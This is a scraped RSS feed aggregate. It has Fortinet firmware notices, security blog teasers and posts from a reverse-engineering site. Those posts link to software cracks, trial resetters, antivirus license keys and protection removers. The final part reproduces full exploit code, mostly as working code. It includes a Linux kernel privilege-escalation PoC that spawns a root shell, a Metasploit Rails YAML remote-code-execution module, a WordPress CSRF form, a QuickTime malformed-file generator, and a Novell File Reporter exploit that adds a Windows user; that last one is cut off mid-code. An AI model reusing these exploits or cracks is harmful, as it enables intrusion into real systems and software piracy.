http://pub.kb.fortinet.com/rss/firmware.xml FortiWeb 4.4.6 B0678 and release notes are available for download from the Support site : https://support.fortinet.com This concerns the following models: * FWB_400B, FWB_400C, FWB_1000B, * FWB_1000C, FWB_3000C, FWB_3000CFSX, * FWB_4000C, FWB_VM-64bit

==> FortiOS 4.3.12

http://pub.kb.fortinet.com/rss/firmware.xml FortiOS 4.3.12 B0656 and release notes are available for download from the Support site : https://support.fortinet.com This concerns the following models: * FGT_800, FGT_3600, FGT_300A, * FGT_100A, FGT_200A, FGT_400A, * FGT_500A, FGT_800F, FGT_5001FA2, * FGT_1000A, FGT_5001, FGT_5005, * FGT_3810A, FGT_50B, FWF_50B, * FGT_3016B, FGT_310B, FGT_30B, * FGT_5005FA2, FGT_224B, FWF_60B, * FGT_60B, FGT_1000AFA2, FGT_1000A_LENC, * FGT_3600A, FGT_5002FB2, FGT_5001A, * FGT_620B, FOC_5001, FOC_5005FA2, * FOC_3810A, FGT_110C, FOC_WF_60B, * FGT_111C, FGT_51B, FGT_80C, * FWF_80CM, FGT_311B, FWF_30B, * FGT_82C, FWF_81CM, FGT_ONE, * FGT_1240B, FGT_3950B, FGT_3951B, * FOC_60B, FOC_5001A, FOC_5001FA2, * FGT_80CM, FGT_200B, FGT_200B_POE, * FGT_310B_DC, FGT_620B_DC, FWF_60C, * FOC_3950B, FOC_3951B, FGT_3040B, * FGT_621B, FGT_3140B, FGT_5001B, * FGT_60C, FGT_VM32, FK_3810A, * FK_5001A, FK_3950B, FK_3951B, * FSW_5203B, FWF_60CX_A, FWF_60CM, * FGT_300C, FOC_80C, FOC_5001B, * FK_5001B, FGT_VM64, FGT_600C, * FGT_1000C, FGT_40C, FWF_40C, * FGT_20C, FWF_20C, FGT_100D, * FGT_3240C, FGT_3140B_LENC, FGT_3140B_DC, * FGT_3040B_LENC, FGT_3040B_DC, FGT_800C, * FGT_60C_POE, FGT_20C_ADSL_A, FWF_20C_ADSL_A,

==> FortiVoiceOS 2.1.0

http://pub.kb.fortinet.com/rss/firmware.xml FortiVoiceOS 2.1.0 B0131 and release notes are available for download from the Support site : https://support.fortinet.com This concerns the following models: * FVC_200D, FVC_200D_T

==> FortiManager 5.0.1

http://pub.kb.fortinet.com/rss/firmware.xml FortiManager 5.0.1 B0121 and release notes are available for download from the Support site : https://support.fortinet.com This concerns the following models: * FMG_1000C, FMG_100C, FMG_3000B, * FMG_3000C, FMG_400B, FMG_400C, * FMG_5001A, FMG_VM32, FMG_VM64, * FMG_200D

==> FortiSwitch 4.3.4

http://pub.kb.fortinet.com/rss/firmware.xml FortiSwitch 4.3.4 B0138 and release notes are available for download from the Support site : https://support.fortinet.com This concerns the following models: * FS_5003B, FS_5003A

==> FortiClient 4.2.8

http://pub.kb.fortinet.com/rss/firmware.xml FortiClient 4.2.8 B0307 and release notes are available for download from the Support site : https://support.fortinet.com This concerns the following models: * Windows_x64, Windows_x86

==> FortiRecorder 1.1.0

http://pub.kb.fortinet.com/rss/firmware.xml FortiRecorder 1.1.0 B0117 and release notes are available for download from the Support site : https://support.fortinet.com This concerns the following models: * FRC_200D

==> FortiSwitch 5.0.0

http://pub.kb.fortinet.com/rss/firmware.xml FortiSwitch 5.0.0 B0005 and release notes are available for download from the Support site : https://support.fortinet.com This concerns the following models: * FS_5003A, FS_5003B, FCTL_5103B,

==> FortiOS 4.2.14

http://pub.kb.fortinet.com/rss/firmware.xml FortiOS 4.2.14 B0353 and release notes are available for download from the Support site : https://support.fortinet.com This concerns the following models: * FGT_30B, FK_3810A, FK_5001A, * FGT_50B, FGT_51B, FGT_60B, * FGT_80C, FGT_80CM, FGT_82C, * FGT_100A, FGT_200A, FGT_110C, * FGT_111C, FGT_200B, FGT_224B, * FGT_300A, FGT_310B, FGT_310B_DC, * FGT_311B, FGT_400A, FGT_500A, * FGT_620B, FGT_620B_DC, FGT_800, * FGT_800F, FGT_1000A, FGT_1000AFA2, * FGT_1000A_LENC, FGT_3016B, FGT_3600A, * FGT_3810A, FGT_5001, FGT_5001A, * FGT_5001FA2, FGT_5005FA2, FOC_3810A, * FOC_5001, FOC_5001A, FOC_5001FA2, * FOC_5005FA2, FWF_30B, FWF_50B, * FWF_60B, FWF_80CM, FWF_81CM, * FGT_1240B, FGT_3600, FGT_200B_POE, * FGT_ONE, FGT_60C, FGT_3950B, * FGT_3951B, FGT_3040B, FGT_621B, * FK_3950B, FK_3951B, FWF_60C, * FGT_VM, FGT_621B_DC, FGT_5001B, * FGT_3140B, FWF_60CM, FK_5001B, * FWF_60CX_A, FGT_3950B_LENC, FGT_200B_LENC, * FGT_300C

==> FortiVoice 7.2.0

http://pub.kb.fortinet.com/rss/firmware.xml FortiVoice 7.2.0 B007 and release notes are available for download from the Support site : https://support.fortinet.com This concerns the following models: * FVC_40, FVC_70, FVC_100,

==> FortiVoice 7.2.0

http://pub.kb.fortinet.com/rss/firmware.xml FortiVoice 7.2.0 B006 and release notes are available for download from the Support site : https://support.fortinet.com This concerns the following models: * FVC_40, FVC_70, FVC_100,

==> FortiWeb 4.4.5

http://pub.kb.fortinet.com/rss/firmware.xml FortiWeb 4.4.5 B0673 and release notes are available for download from the Support site : https://support.fortinet.com This concerns the following models: * FWB_400B, FWB_400C, FWB_1000B, * FWB_1000C, FWB_3000C, FWB_3000CFSX, * FWB_4000C, FWB_VM-64bit

==> FortiClient Mac 5.0.1

http://pub.kb.fortinet.com/rss/firmware.xml FortiClient Mac 5.0.1 B0082 and release notes are available for download from the Support site : https://support.fortinet.com This concerns the following models: * MacOS

==> FortiClient 5.0.1

http://pub.kb.fortinet.com/rss/firmware.xml FortiClient 5.0.1 B0194 and release notes are available for download from the Support site : https://support.fortinet.com This concerns the following models: * Windows_x64, Windows_x86

==> FortiAP 5.0.1

http://pub.kb.fortinet.com/rss/firmware.xml FortiAP 5.0.1 B0024 and release notes are available for download from the Support site : https://support.fortinet.com This concerns the following models: * FAP_210B, FAP_220B, FAP_221B, * FAP_222B, FAP_112B, FAP_320B, * FAP_223B, FAP_11C

==> FortiOS 5.0.1

http://pub.kb.fortinet.com/rss/firmware.xml FortiOS 5.0.1 B0147 and release notes are available for download from the Support site : https://support.fortinet.com This concerns the following models: * FGT_40C, FGT_60C, FGT_80C, * FGT_80CM, FGT_110C, FGT_111C, * FGT_200B, FGT_200B_POE, FGT_300C, * FGT_310B, FGT_311B, FGT_620B, * FGT_620B_DC, FGT_621B, FGT_1240B, * FGT_3016B, FGT_3040B, FGT_3140B, * FGT_3810A, FGT_3950B, FGT_3951B, * FGT_5001A, FGT_5001B, FGT_VM32, * FGT_VM64, FWF_40C, FWF_60C, * FWF_60CM, FWF_60CX_A, FWF_80CM, * FWF_81CM, FGT_310B_DC, FGT_3040B_DC, * FGT_3040B_LENC, FGT_3140B_LENC, FGT_3140B_DC, * FGT_800C, FGT_1000C, FGT_100D, * FGT_5101C, FGT_600C, FSW_5203B, * FWF_20C, FGT_20C, FGT_60C_POE, * FGT_20C_ADSL_A, FWF_20C_ADSL_A, FGT_3240C,

==> FortiMail 4.3.4

http://pub.kb.fortinet.com/rss/firmware.xml FortiMail 4.3.4 B0528 and release notes are available for download from the Support site : https://support.fortinet.com This concerns the following models: * FE_100, FE_100C, FE_400, * FE_400B, FE_400C, FE_2000, * FE_2000A, FE_2000B, FE_3000C, * FE_3000C_LENC, FE_4000, FE_5001A, * FE_5002B, FE_VM, FE_200D,

==> FortiVoice 7.2.0

http://pub.kb.fortinet.com/rss/firmware.xml FortiVoice 7.2.0 B005 and release notes are available for download from the Support site : https://support.fortinet.com This concerns the following models: * FVC_40, FVC_70, FVC_100,

==> FortiAnalyzer 4.3.6

http://pub.kb.fortinet.com/rss/firmware.xml FortiAnalyzer 4.3.6 B0691 and release notes are available for download from the Support site : https://support.fortinet.com This concerns the following models: * FLG_100B, FLG_100C, FLG_400B, * FLG_800, FLG_800B, FLG_1000B, * FLG_1000C, FLG_2000, FLG_2000A, * FLG_2000B, FLG_4000, FLG_4000A, * FLG_4000B, FLG_VM32, FLG_400C, * FLG_VM64, FLG_200D

==> History of memory corruption vulnerabilities and exploits

http://rdist.root.org/feed/ I came across a great paper, “Memory Errors: The Past, the Present, and the Future” by van der Veen et al. The authors cover the history of memory corruption errors as well as exploitation and countermeasures. I think there are a number of interesting conclusions to draw from it. It seems that the number of [...]

==> Has HTML5 made us more secure?

http://rdist.root.org/feed/ Brad Hill recently wrote an article claiming that HTML5 has made us more secure, not less. His essential claim is that over the last 10 years, browsers have become more secure. He compares IE6, ActiveX, and Flash in 2002 (when he started in infosec) with HTML5 in order to make this point. While I think [...]

==> Toggl time-tracking service failures

http://rdist.root.org/feed/ A while ago, we investigated using various time-tracking services. Making this quick and easy for employees is helpful in a consulting company. Our experience with one service should serve as a cautionary note for web 2.0 companies that want to sell to businesses. Time tracking is a service that seems both boring and easy to [...]

==> Cyber-weapon authors catch up on blog reading

http://rdist.root.org/feed/ One of the more popular posts on this blog was the one pointing out how Stuxnet was unsophisticated. Its use of traditional malware methods and lack of protection for the payload indicated that the authors were either “Team B” or in a big hurry. The post was intended to counteract the breathless praise in the [...]

==> RSA repeats earlier claims, but louder

http://rdist.root.org/feed/ Sam Curry of RSA was nice enough to respond to my post. Here’s a few points that jumped out at me from what he wrote: RSA is in the process of fixing the downgrade attack that allows an attacker to choose PKCS #1 v1.5, even if the key was generated by a user who selected [...]

==> Why RSA is misleading about SecurID vulnerability

http://rdist.root.org/feed/ There’s an extensive rebuttal RSA wrote in response to a paper showing that their SecurID 800 token has a crypto vulnerability. It’s interesting how RSA’s response walks around the research without directly addressing it. A perfectly accurate (but inflammatory) headline could also have been “RSA’s RSA Implementation Contained Security Flaw Known Since 1998“. The research [...]

==> OllyDbg 2.00.01 (Final)

http://reversengineering.wordpress.com/feed/ OllyDbg 2.0 is a 32-bit assembler-level analyzing Degugger with intuitive interface. It is especially useful if source code is not available or when you experience problems with your compiler. Requirements. Developed and tested mainly under Windows 2000 and Windows XP, but should work under any Windows version: 95, 98, ME, NT, 2000, XP, 2003 Server, [...]

==> PROTECTiON iD 6.4.0

http://reversengineering.wordpress.com/feed/ Features: - detection of every major PC ISO Game / Application protection - currently covers 475 detections, including win32/64 exe protectors & packers, .net protectors, dongles, licenses & installers - sector scanning CDs / DVDs for Copy Protections - files / folders can simply be drag & droped into pid - strong scanning routines allowing [...]

==> StrongOD 0.3.4.639

http://reversengineering.wordpress.com/feed/ Make your OllyDbg Strong! This plug-in provides three kinds of ways to initiate the process: 1, Normal – And the same manner as the original start, the STARTUPINFO inside unclean data 2, CreateAsUser – User with a mandate to initiate the process of the user, so that the process running under the purview of the [...]

==> Broken links ! لینکهایی که کار نمی کند

http://reversengineering.wordpress.com/feed/ hi dear friends tell me about broken links in this post i will find it on my system and after that i will try [...]

==> Trial Reset 4 Final

http://reversengineering.wordpress.com/feed/ Trial Reset 4 Final Tnx fly to his programmer http://rapidshare.com/files/409095074/Trial-Reset40Final.zip http://reversengineering.files.wordpress.com/2010/07/trial-reset40final-zip.jpg you know what to do;) Filed under: OTHER, TOOLS

==> The newest NOD32 keys with MVGM NOD32 Licence v1.0

http://reversengineering.wordpress.com/feed/ HI The newest NOD32 keys with MVGM NOD32 Licence v1.0 NOD32 [...]

==> TrialReset 4.0 Final (Public)

http://reversengineering.wordpress.com/feed/ hi to all i am here again thank u for ur supporting The small program for remove trial of apps. Works with all the widespread systems of protection. The interface is very simple: [...]

==> ODDragAttach 1.1

http://reversengineering.wordpress.com/feed/ Author Exile Description Choice is, it will add the window corresponding to the process of src and bin. Window, the process of selection, OD automatically minimize the window, select the target window, then maximize the window, OD. Note: Some versions of the OD program may cover an open button, can be changed according [...]

==> Attach Extended 0.1

http://reversengineering.wordpress.com/feed/ This is a really small plugin that I have written for improving attach feature of OllyDbg. With this plugin, you can attach to process by identifying its PID directly, not only selecting process list. In addition, you can find PID of process by dragging a small cursor on each window (This can be used on [...]

==> Mapimp 0.4

http://reversengineering.wordpress.com/feed/ Author takerZ Description This is an open source OllyDbg plugin which will help you to import map files exported by IDA or Dede. There are many plugins using which you can perform similar actions, but mapimp: - Recognizes debugged file segments and applies names correctly - Has an option to overwrite or skip [...]

==> Obsidium 1.4.x.x OEP Finder + IAT Repair v0.1

http://reversengineering.wordpress.com/feed/ http://letitbit.net/download/7203.a79ca10d2342f1b32333add72/Obsidium_1.4.x.x_OEP_Finder___IAT_Repair_v0.1.txt.html Author Pavka Posted in Scripts, TOOLS

==> MUltimate Assembler 1.2

http://reversengineering.wordpress.com/feed/ Author RaMMicHaeL A multi-line (dis)assembler tool, perfect for writing code caves. It supports: - labels and data (C-style string) - external jumps and calls. http://letitbit.net/download/6671.c63ed09074b57c49b4cd2067e/MUltimate_Assembler_v1.2.rar.html Posted in OLLY'S PLUGINS, TOOLS

==> VMProtect 1.7 – 1.8 OEP Finder + Unpack Helper v1.0

http://reversengineering.wordpress.com/feed/ http://letitbit.net/download/2516.25addf1167522eb8602b67146/VMProtect_1.7___1.8_OEP_Finder___Unpack_Helper_v1.0.txt.html by LCF-AT Posted in Scripts, TOOLS

==> CodeDoctor 0.90

http://reversengineering.wordpress.com/feed/ Functions: 1) Deobfuscate Select instructions in disasm window and execute this command. It will try to clear the code from junk instructions. Example: Original: 00874372 57 PUSH EDI 00874373 BF 352AAF6A MOV EDI,6AAF2A35 00874378 81E7 0D152A41 AND EDI,412A150D 0087437E 81F7 01002A40 XOR EDI,402A0001 00874384 01FB ADD EBX,EDI 00874386 5F POP EDI Deobfuscated: 00874372 83C3 04 [...]

==> Themida + WinLicense 1.1.0.0 – 2.1.0.0 Dumper + IAT Repair + CodeEncrypt Repair v2.6.0

http://reversengineering.wordpress.com/feed/ by Quosego http://letitbit.net/download/5120.c5ff8c01bf87b5594de7f4fbc/Themida___WinLicense_1.1.0.0___2.1.0.0_Dumper___IAT_Repair___CodeEncrypt_Repair_v2.6.0.txt.html Posted in Scripts, TOOLS

==> Scripad 1.0 + ODBGScript 1.77.3

http://reversengineering.wordpress.com/feed/ ODbgScript is a plugin for OllyDbg, which is, in our opinion, the best application-mode debugger out there. One of the best features of this debugger is the plugin architecture which allows users to extend its functionality. ODbgScript is a plugin meant to let you automate OllyDbg by writing scripts in an assembly-like language. Many tasks [...]

==> StrongOD 0.2.6.415

http://reversengineering.wordpress.com/feed/ This will be a seperate download of StrongOD as of version 0.2.4.350 because – as strange as it sounds – the developer has protected it! This plugin will now require a key for it to run and be used. You can obtain a valid key by emailing: StrongODsafengine.com http://letitbit.net/download/9563.9f5459d00eca80b4993740279/StrongOD_v0.2.6.415.rar.html Posted in OLLY'S PLUGINS, TOOLS

==> PDF Protection Remover 3.0

http://reversengineering.wordpress.com/feed/ http://letitbit.net/download/8140.813d385e39b7bcbb34ccc58af/PDF_Protection_Remover_3.0___Patch_DJiNN.rar.html pass :www.2baksa.net Posted in TOOLS, Uncategorized

==> HOlly 0.2 Build 81

http://reversengineering.wordpress.com/feed/ This is my OllyDbg mod named HOlly. I will be constantly adding features as I require them or they are requested. Currently it only has a multiline assembler that needs some work but I would like some input. So if I could get some input on the following that would be great. http://letitbit.net/download/3997.d3730400452d29f3a615da1f7/HOlly_v0.2_Build_81.rar.html Posted in [...]

==> Themida+WL1.1.0.0-2.1.0.0Dumper+IAT Repair+CodeEncryptRepair_v2.6.0

http://reversengineering.wordpress.com/feed/ Themida+WL1.1.0.0-2.1.0.0Dumper+IAT Repair+CodeEncryptRepair_v2.6.0 By [SND]quosego Hi all, It’s time to make a final stand. Oreans it’s your turn now. This package includes the following; WL.&.TM.VM.dumper.&.IAT.CodeEnc.Fixer.v2.6.0-SnD A script to unpack all known versions of Winlicense and Themida using any options. The script will unpack all known Themida and Winlicense applications using virtual machine antidump on Windows XP. [...]

==> Linux Kernel 3.x Privilege Escalation Exploit

http://rss.feedsportal.com/c/32479/f/477548/index.rss /* * quick'n'dirty poc for CVE-2013-1763 SOCK_DIAG bug in kernel 3.3-3.8 * bug found by Spender * poc by SynQ * * hard-coded for 3.5.0-17-generic #28-Ubuntu SMP Tue Oct 9 19:32:08 UTC 2012 i686 i686 i686 GNU/Linux * using nl_table->hash.rehash_time, index 81 * * Fedora 18 support added * * 2/2013 */ #include <unistd.h> #include <sys/socket.h> #include <linux/netlink.h> #include <netinet/tcp.h> #include <errno.h> #include <linux/if.h> #include <linux/filter.h> #include <string.h> #include <stdio.h> #include <stdlib.h> #include <linux/sock_diag.h> #include <linux/inet_diag.h> #include <linux/unix_diag.h> #include <sys/mman.h> typedef int attribute((regparm(3))) (* _commit_creds)(unsigned long cred); typedef unsigned long attribute((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred); _commit_creds commit_creds; _prepare_kernel_cred prepare_kernel_cred; unsigned long sock_diag_handlers, nl_table; int attribute((regparm(3))) kernel_code() { commit_creds(prepare_kernel_cred(0)); return -1; } int jump_payload_not_used(void *skb, void *nlh) { asm volatile ( "mov $kernel_code, %eax\n" "call *%eax\n" ); } unsigned long get_symbol(char *name) { FILE *f; unsigned long addr; char dummy, sym[512]; int ret = 0; f = fopen("/proc/kallsyms", "r"); if (!f) { return 0; } while (ret != EOF) { ret = fscanf(f, "%p %c %s\n", (void **) &addr, &dummy, sym); if (ret == 0) { fscanf(f, "%s\n", sym); continue; } if (!strcmp(name, sym)) { printf("[+] resolved symbol %s to %p\n", name, (void *) addr); fclose(f); return addr; } } fclose(f); return 0; } int main(int argc, char*argv[]) { int fd; unsigned family; struct { struct nlmsghdr nlh; struct unix_diag_req r; } req; char buf[8192]; if ((fd = socket(AF_NETLINK, SOCK_RAW, NETLINK_SOCK_DIAG)) < 0){ printf("Can't create sock diag socket\n"); return -1; } memset(&req, 0, sizeof(req)); req.nlh.nlmsg_len = sizeof(req); req.nlh.nlmsg_type = SOCK_DIAG_BY_FAMILY; req.nlh.nlmsg_flags = NLM_F_ROOT|NLM_F_MATCH|NLM_F_REQUEST; req.nlh.nlmsg_seq = 123456; //req.r.sdiag_family = 89; req.r.udiag_states = -1; req.r.udiag_show = UDIAG_SHOW_NAME | UDIAG_SHOW_PEER | UDIAG_SHOW_RQLEN; if(argc==1){ printf("Run: %s Fedora|Ubuntu\n",argv[0]); return 0; } else if(strcmp(argv[1],"Fedora")==0){ commit_creds = (_commit_creds) get_symbol("commit_creds"); prepare_kernel_cred = (_prepare_kernel_cred) get_symbol("prepare_kernel_cred"); sock_diag_handlers = get_symbol("sock_diag_handlers"); nl_table = get_symbol("nl_table"); if(!prepare_kernel_cred || !commit_creds || !sock_diag_handlers || !nl_table){ printf("some symbols are not available!\n"); exit(1); } family = (nl_table - sock_diag_handlers) / 4; printf("family=%d\n",family); req.r.sdiag_family = family; if(family>255){ printf("nl_table is too far!\n"); exit(1); } } else if(strcmp(argv[1],"Ubuntu")==0){ commit_creds = (_commit_creds) 0xc106bc60; prepare_kernel_cred = (_prepare_kernel_cred) 0xc106bea0; req.r.sdiag_family = 81; } unsigned long mmap_start, mmap_size; mmap_start = 0x10000; mmap_size = 0x120000; printf("mmapping at 0x%lx, size = 0x%lx\n", mmap_start, mmap_size); if (mmap((void*)mmap_start, mmap_size, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) == MAP_FAILED) { printf("mmap fault\n"); exit(1); } memset((void*)mmap_start, 0x90, mmap_size); char jump[] = "\x55\x89\xe5\xb8\x11\x11\x11\x11\xff\xd0\x5d\xc3"; // jump_payload in asm unsigned long *asd = &jump[4]; *asd = (unsigned long)kernel_code; memcpy( (void*)mmap_start+mmap_size-sizeof(jump), jump, sizeof(jump)); if ( send(fd, &req, sizeof(req), 0) < 0) { printf("bad send\n"); close(fd); return -1; } printf("uid=%d, euid=%d\n",getuid(), geteuid() ); if(!getuid()) system("/bin/sh");

==> Apple QuickTime Player (Windows) Version 7.7.3 Out of Bound Read

http://rss.feedsportal.com/c/32479/f/477548/index.rss # Title: Apple Quick Time Player (Windows)Version 7.7.3 Out of Bound Read # Date: 28th January,2013 # Author: Debasish Mandal (https://twitter.com/debasishm89) # Blog : http://www.debasish.in/ # Vendor Homepage: http://www.apple.com/ # Software Link: http://www.apple.com/quicktime/download/ # Version: Apple Quick Time version 7.7.3 # Tested on: Windows XP SP2 / Windows 7 ''' [+] Summary: A memory out of bound read issue exists in Apple Quick Time Player v7.7.3 which can be triggered while trying to open a specially crafted "qtif" image file using Quick Time Player/Quick time Picture Viewer or Quick Time Browser Plug-in. If successful, a malicious third party could trigger an invalid memory access, leading to a crash of the process. [+] Affected Module : QuickTime.qts [+] Crash Point: Faulting Instruction: QuickTime!LIST_ComponentDispatch+0x15ffd3: 66a1a4e3 8b0c06 mov ecx,dword ptr [esi+eax] ds:0023:42531f20=???????? 0:000> r eax=41414198 ebx=58580000 ecx=414141a0 edx=58585858 esi=0111dd88 edi=41414198 eip=66a1a4e3 esp=0012f324 ebp=42424242 iopl=0 nv up ei ng nz ac po cy cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00210293 QuickTime!LIST_ComponentDispatch+0x15ffd3: 66a1a4e3 8b0c06 mov ecx,dword ptr [esi+eax] ds:0023:42531f20=???????? [+] Buggy Code:(Code from C:\Program Files\QuickTime\QTSystem\QuickTime.qts) 66A1A4E1 77 70 JA SHORT QuickTim.66A1A553 66A1A4E3 8B0C06 MOV ECX,DWORD PTR DS:[ESI+EAX] 66A1A4E6 0FB65406 03 MOVZX EDX,BYTE PTR DS:[ESI+EAX+3] 66A1A4EB 894C24 14 MOV DWORD PTR SS:[ESP+14],ECX 66A1A4EF 8A7424 16 MOV DH,BYTE PTR SS:[ESP+16] 66A1A4F3 8BF9 MOV EDI,ECX 66A1A4F5 C1E7 10 SHL EDI,10 66A1A4F8 81E1 00FF0000 AND ECX,0FF00 66A1A4FE 0BF9 OR EDI,ECX 66A1A500 C1E7 08 SHL EDI,8 66A1A503 0BD7 OR EDX,EDI 66A1A505 8BCA MOV ECX,EDX 66A1A507 7E 4A JLE SHORT QuickTim.66A1A553 66A1A509 8D3C01 LEA EDI,DWORD PTR DS:[ECX+EAX] 66A1A50C 3BEF CMP EBP,EDI 66A1A50E 72 43 JB SHORT QuickTim.66A1A553 66A1A510 3BF8 CMP EDI,EAX 66A1A512 72 3F JB SHORT QuickTim.66A1A553 66A1A514 8B4C06 04 MOV ECX,DWORD PTR DS:[ESI+EAX+4] 66A1A518 0FB65406 07 MOVZX EDX,BYTE PTR DS:[ESI+EAX+7] 66A1A51D 894C24 14 MOV DWORD PTR SS:[ESP+14],ECX 66A1A521 8A7424 16 MOV DH,BYTE PTR SS:[ESP+16] 66A1A525 8BD9 MOV EBX,ECX 66A1A527 C1E3 10 SHL EBX,10 66A1A52A 81E1 00FF0000 AND ECX,0FF00 66A1A530 0BD9 OR EBX,ECX 66A1A532 8B4C24 18 MOV ECX,DWORD PTR SS:[ESP+18] 66A1A536 C1E3 08 SHL EBX,8 66A1A539 0BD3 OR EDX,EBX 66A1A53B 3BD1 CMP EDX,ECX 66A1A53D 74 04 JE SHORT QuickTim.66A1A543 66A1A53F 85C9 TEST ECX,ECX 66A1A541 75 07 JNZ SHORT QuickTim.66A1A54A 66A1A543 836C24 1C 01 SUB DWORD PTR SS:[ESP+1C],1 66A1A548 74 0B JE SHORT QuickTim.66A1A555 66A1A54A 8BC7 MOV EAX,EDI 66A1A54C 8D48 08 LEA ECX,DWORD PTR DS:[EAX+8] 66A1A54F 3BCD CMP ECX,EBP 66A1A551 ^76 90 JBE SHORT QuickTim.66A1A4E3 66A1A553 33C0 XOR EAX,EAX [+] Proof of Concept : ''' # /usr/bin/python buff = "" buff += "\x00\x00\x48\x79\x69\x64\x61\x74" buff += "\x5A"*18545 #Junks buff += "\x00\x00\x00\x6E\x69\x64\x73\x63" #nidsc header buff += "\x42\x42\x42\x42" buff += "\x5A"*82 #Junk buff += "\x41"*3 buff += "\x42" buff += "\x58\x58\x58\x58" f = open('buggy.qtif','w') f.write(buff) f.close()

==> WordPress SolveMedia 1.1.0 CSRF PoC

http://rss.feedsportal.com/c/32479/f/477548/index.rss <html> <form method="post" action="http://server/wp-admin/plugins.php?page=solvemedia/solvemedia.admin.inc&updated=true"> <input name="adcopy_opt_pubkey" id="adcopy_opt_pubkey" size="40" value="[ ATTACKERS PUBLIC KEY ]" style="display:none;"/> <input name="adcopy_opt_privkey" id="adcopy_opt_privkey" size="40" value="[ ATTACKERS PRIVATE KEY ]" style="display:none;"/> <input name="adcopy_opt_hashkey" id="adcopy_opt_hashkey" size="40" value="[ ATTACKERS HASH KEY ]" style="display:none;" /> <input type="submit" name="submit" value="Enter" /> </form>

==> Ruby on Rails JSON Processor YAML Deserialization Code Execution

http://rss.feedsportal.com/c/32479/f/477548/index.rss ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. # http://metasploit.com/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::CmdStagerTFTP include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'Ruby on Rails JSON Processor YAML Deserialization Code Execution', 'Description' => %q{ This module exploits a remote code execution vulnerability in the JSON request processor of the Ruby on Rails application framework. This vulnerability allows an attacker to instantiate a remote object, which in turn can be used to execute any ruby code remotely in the context of the application. This vulnerability is very similar to CVE-2013-0156. This module has been tested successfully on RoR 3.0.9, 3.0.19, and 2.3.15. The technique used by this module requires the target to be running a fairly recent version of Ruby 1.9 (since 2011 or so). Applications using Ruby 1.8 may still be exploitable using the init_with() method, but this has not been demonstrated. }, 'Author' => [ 'jjarmoc', # Initial module based on cve-2013-0156, testing help 'egypt', # Module 'lian', # Identified the RouteSet::NamedRouteCollection vector ], 'License' => MSF_LICENSE, 'References' => [ ['CVE', '2013-0333'], ], 'Platform' => 'ruby', 'Arch' => ARCH_RUBY, 'Privileged' => false, 'Targets' => [ ['Automatic', {} ] ], 'DisclosureDate' => 'Jan 28 2013', 'DefaultOptions' => { "PrependFork" => true }, 'DefaultTarget' => 0)) register_options( [ Opt::RPORT(80), OptString.new('TARGETURI', [ true, 'The path to a vulnerable Ruby on Rails application', "/"]), OptString.new('HTTP_METHOD', [ true, 'The HTTP request method (GET, POST, PUT typically work)', "POST"]) ], self.class) end # # Create the YAML document that will be embedded into the JSON # def build_yaml_rails2 code = Rex::Text.encode_base64(payload.encoded) yaml = "--- !ruby/hash:ActionController::Routing::RouteSet::NamedRouteCollection\n" + "'#{Rex::Text.rand_text_alpha(rand(8)+1)}; " + "eval(%[#{code}].unpack(%[m0])[0]);' " + ": !ruby/object:ActionController::Routing::Route\n segments: []\n requirements:\n " + ":#{Rex::Text.rand_text_alpha(rand(8)+1)}:\n :#{Rex::Text.rand_text_alpha(rand(8)+1)}: " + ":#{Rex::Text.rand_text_alpha(rand(8)+1)}\n" yaml.gsub(':', '\u003a') end # # Create the YAML document that will be embedded into the JSON # def build_yaml_rails3 code = Rex::Text.encode_base64(payload.encoded) yaml = "--- !ruby/hash:ActionDispatch::Routing::RouteSet::NamedRouteCollection\n" + "'#{Rex::Text.rand_text_alpha(rand(8)+1)};eval(%[#{code}].unpack(%[m0])[0]);' " + ": !ruby/object:OpenStruct\n table:\n :defaults: {}\n" yaml.gsub(':', '\u003a') end def build_request(v) case v when 2; build_yaml_rails2 when 3; build_yaml_rails3 end end # # Send the actual request # def exploit 2,.each do |ver| print_status("Sending Railsv#{ver} request to #{rhost}:#{rport}...") send_request_cgi({ 'uri' => normalize_uri(target_uri.path), 'method' => datastore['HTTP_METHOD'], 'ctype' => 'application/json', 'headers' => { 'X-HTTP-Method-Override' => 'get' }, 'data' => build_request(ver) }, 25) handler end end end

==> Java 0day 1.7.0_10 RCE PoC

http://rss.feedsportal.com/c/32479/f/477548/index.rss

==> Novell File Reporter Agent XML Parsing Remote Code Execution Exploit

http://rss.feedsportal.com/c/32479/f/477548/index.rss # wwww.abysssec.com # Novell File Reporter Agent XML Parsing Remote Code Execution Vulnerability (0day) # CVE-2012-4959 # @abysssec # well just one more of our 0day got published after ~2 year # here is info : https://community.rapid7.com/community/metasploit/blog/2012/11/16/nfr-agent-buffer-vulnerabilites-cve-2012-4959 # and here is our exploit import httplib, md5, sys def message_MD5(arg): v = "SRS" + arg + "SERVER" m = md5.new(v) return m.hexdigest() def genMof(command="net user abysssec 123456 /add"): vbs = "" vbs += "\"Set objShell = CreateObject(\\\"WScript.Shell\\\")\\n\"\n" vbs += "\"objShell.Run \\\"cmd.exe /C " vbs += command vbs += "\\\"\"" mof = """ #pragma namespace ("\\\\\\\\.\\\\root\\\\subscription") #pragma deleteclass("MyASEventConsumer", nofail) #pragma deleteinstance("__EventFilter.Name=\\\"EF\\\"", nofail) #pragma deleteinstance("ActiveScriptEventConsumer.Name=\\\"ASEC\\\"", nofail) class MyASEventConsumer { [key]string Name; }; instance of ActiveScriptEventConsumer as $CONSUMER { CreatorSID = {1,2,0,0,0,0,0,5,32,0,0,0,32,2,0,0}; Name = "ASEC"; ScriptingEngine = "VBScript"; ScriptText = SCRIPT; }; instance of __EventFilter as $FILTER { CreatorSID = {1,2,0,0,0,0,0,5,32,0,0,0,32,2,0,0}; Name = "EF"; Query = "SELECT * FROM __InstanceCreationEvent" " WHERE TargetInstance.__class = \\"MyASEventConsumer\\""; QueryLanguage = "WQL"; }; instance of __FilterToConsumerBinding as $BINDING { CreatorSID = {1,2,0,0,0,0,0,5,32,0,0,0,32,2,0,0}; Filter = $FILTER; Consumer = $CONSUMER; }; instance of MyASEventConsumer { Name = "Trigger"; }; """.replace('SCRIPT',vbs) return mof def main(argv=None): if argv is None: argv = sys.argv if len(argv) != 2: print 